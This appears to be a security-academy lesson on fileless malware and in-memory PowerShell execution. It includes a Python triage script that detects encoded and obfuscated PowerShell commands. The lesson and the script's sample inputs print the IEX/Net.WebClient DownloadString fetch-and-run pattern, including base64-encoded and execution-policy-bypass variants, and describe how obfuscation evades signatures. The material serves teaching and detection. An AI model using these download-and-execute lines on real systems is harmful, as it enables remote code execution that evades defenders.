Cyber Security Academy · Lesson

Fileless Malware and Living-in-Memory Techniques

Analyze PowerShell-based malware, process injection, and in-memory execution that leaves no disk artifacts.

What is Fileless Malware?

Fileless malware executes entirely in memory without writing executable files to disk. It relies on legitimate OS tools, interpreter environments (PowerShell, WScript), and in-memory injection, so it leaves few forensic artifacts that traditional AV and file-based scanning can detect.

PowerShell-Based Attacks

PowerShell enables download-and-execute patterns: a script is fetched from the internet as a string and passed to IEX (Invoke-Expression), which runs it directly in memory without touching disk. Obfuscation techniques (character replacement, base64, string concatenation) bypass signature-based detection of malicious script content.

# Example obfuscation pattern (for awareness)
# IEX (New-Object Net.WebClient).DownloadString(url)
# Often base64-encoded to evade detection
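
From the detection side, the pattern above can be triaged in process-creation logs by decoding any -EncodedCommand argument and undoing string concatenation before matching. The following is an added example, not part of the original lesson; the function names, indicator labels and sample command lines are constructed for illustration.

```python
import base64
import re

# Matches "-e<letters> <base64>"; the name is validated in decode_encoded_command.
ENC_ARG = re.compile(r"\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b"),
    "web_download": re.compile(r"net\.webclient|downloadstring"),
}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    for m in ENC_ARG.finditer(cmdline):
        name = m.group(1).lower()
        # Accept -ec and prefixes of -EncodedCommand such as -e and -enc.
        if name != "ec" and not "encodedcommand".startswith(name):
            continue
        try:
            # The payload is base64 over UTF-16LE text.
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except ValueError:  # malformed base64 or malformed UTF-16
            return None
    return None

def normalize(script):
    """Join 'a'+'b' string concatenations and lowercase the text."""
    return re.sub(r"""['"]\s*\+\s*['"]""", "", script).lower()

def triage(cmdline):
    """Return the indicator labels found in one PowerShell command line."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
    text = normalize(decoded if decoded is not None else cmdline)
    findings += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return findings

# Constructed sample command lines built from the pattern shown in the lesson.
PAGE_PATTERN = "IEX (New-Object Net.WebClient).DownloadString($url)"
SAMPLES = [
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    'powershell.exe -nop -c "' + PAGE_PATTERN + '"',
    "powershell.exe -nop -c \"IEX ('(New-Object Net.WebClient).Down'+'loadString($url)')\"",
    "powershell.exe -ExecutionPolicy Bypass -enc "
    + base64.b64encode(PAGE_PATTERN.encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

Matching on the command line only covers what the parent process passed in; script content loaded later is visible through PowerShell script block logging rather than process-creation events.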
